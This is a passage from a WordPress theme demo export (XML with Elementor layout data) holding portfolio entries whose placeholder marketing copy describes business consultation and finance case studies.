		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>773</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:26:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:26:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-consultation]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="business"><![CDATA[business]]></category>
		<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"3eb71c6","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"40279fc","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"f75ccb2","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3fdd108","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"31adc79","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"a1676c3","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"925bd17","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"98d8bcd","elType":"widget","settings":{"editor":"<p>BusinessMax<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"4516c47","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3b7b92a","elType":"widget","settings":{"editor":"<p>businessmax.com<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"c389ea2","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"86fc555","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2bed14d","elType":"widget","settings":{"editor":"<p>November 22, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"f07866b","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"14874f9","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"03b8867","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"47f5968","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"edf6855","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"de4c7f4","elType":"section","settings":[],"elements":[{"id":"b163c5f","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"8d4047c","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"f92e518","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"1daeb0d","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"3cb053b","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"80091d4","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"f0d3be9","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"77268e0","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"1dbc853","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"c27f915","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2dbc3de","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"d093a27","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"cf88646","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"0874902","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"8de3749","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"f8c6a6f","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"f52a2f0","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"0b41736","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"df43829","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"67d5856","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"0012d97","elType":"widget","settings":{"editor":"A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.\n\nWe helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #52C5B6;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"960ad5e","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"10160b0","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-values-home-5.png","id":2364},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"2d78d35","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1218]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[778]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[thumb_size]]></wp:meta_key>
		<wp:meta_value><![CDATA[double_wh]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Insurance Finance</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/insurance-finance/</link>
		<pubDate>Fri, 11 Sep 2020 04:48:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=818</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>November 09, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.
We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-values-home-5-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>818</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:48:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:48:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[insurance-finance]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="startup"><![CDATA[startup]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[819]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"927f8df","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"6791ad66","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"445a200a","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with 